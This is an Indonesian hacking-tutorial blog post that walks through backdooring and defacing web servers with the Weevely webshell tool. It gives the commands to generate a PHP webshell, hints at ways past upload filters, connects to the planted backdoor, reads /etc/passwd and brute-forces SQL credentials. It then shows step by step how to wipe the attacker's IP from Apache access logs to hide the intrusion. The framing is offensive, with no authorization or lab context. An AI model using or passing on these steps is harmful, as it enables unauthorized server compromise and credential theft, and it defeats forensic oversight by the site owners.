Ditulis oleh AC10 Writer
⭐⭐⭐⭐⭐

Cara Backdoor dan Deface Web Server Menggunakan Weevely


Hacks yang Mungkin Anda cari :

Weevely merupakan sebuah Webshell Management Tool yang ditulis menggunkakan bahasa pemrograman Phyton. Weevely hanya ini tersedia untuk sistem operasi Linux.

Bagaimana cara melakukan Backdoor dan Deface Web Server Menggunakan Weevely?

Langsung saja ke langkah-langkahnya.

Baca juga,

Instalasi
[email protected]:~# pip install prettytable Mako PyYAML python-dateutil PySocks –upgrade
[email protected]:~# apt-get install g++ python-pip libyaml-dev python-dev

Cara menjalankan Weevely

Backdoor dan Deface Web Server Menggunakan Weevely


Membuat sebuah Backdoor
[email protected]:~# weevely generate ddos ddos.php 
*bd core ddos.php modules utils weevely.py

Anda perlu menggunakan beberapa teknik untuk mengunggah webshell seperti teknik double extension, bypass image type validation, bypass whilelist/blacklist.
Lihat disini

Koneksikan ke Backdoor
[email protected]:/usr/share/weevely# weevely http://192.168.1.8/ddos.php ddos
Backdoor dan Deface Web Server Menggunakan Weevely


Bypass Policy to Read /etc/passwd
[email protected]:/etc $ audit_etcpasswd
Backdoor dan Deface Web Server Menggunakan Weevely


Menebak Credential SQL user
Langkah ini merupakan cara menebak kredensial dari beberapa pengguna SQL.
weevely> bruteforce_sql –help
Backdoor dan Deface Web Server Menggunakan Weevely


Pembersihan log
Trik ini untuk adalah cara membersihkan catatan log pada server.

Backdoor dan Deface Web Server Menggunakan Weevely


Disini kita gunakan command system_info untuk mendapatkan Ip yang kita gunakan
[email protected]:/var/log $ system_info -info client_ip

Kita gunakan grep command untuk mengkonfirm bahwa Ip yang telah kita dapatkan berada dalam file Log
[email protected]:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep “192.168.1.8”
Backdoor dan Deface Web Server Menggunakan Weevely


Kita akan melihat bahwa aktifitas Ip kita telah terecord atau terekam pada Log.
Disini kita akan menggunakan perintah Grep untuk menghapus Ip lalu menyimpannya ke file sementara / temporary file.
[email protected]:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep -v “192.168.1.8” > cleaned.log

Silahkan uji apakah Ip telah berhasil kita hapus
[email protected]:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep -v “192.168.1.8” > cleaned.log
[email protected]:/var/log/apache2 $ cat cleaned.log |grep “192.168.1.8”
[email protected]:/var/log/apache2 $ 

Lalu kita ganti file cleaned.log dengan access.log.1
[email protected]:/var/log/apache2 $ rm access.log.1
[email protected]:/var/log/apache2 $ mv cleaned.log access.log.1

Demo

JANGAN LEWATKAN TRIK HACKS INI :
Share tips trik Hacks ini ke teman Anda

Tips Trik Tutorial Hacks Cara Backdoor dan Deface Web Server Menggunakan Weevely

Download dan install aplikasi android AC10 Hacks kami DISINI dan dapatkan update hacks terbaru hanya dengan membuka aplikasi kami langsung dari HP android Anda. Untuk berkomentar atau bertanya tentang topik

artikel cara Hacks tips trik Cara Backdoor dan Deface Web Server Menggunakan Weevely

diatas atau lainnya silahkan terhubung dengan kami dengan menyukai fanspage facebook ArtikelCara10 Hacking Tutorials dan bergabung dengan grup Hacking Tutorials | AC10, terimakasih.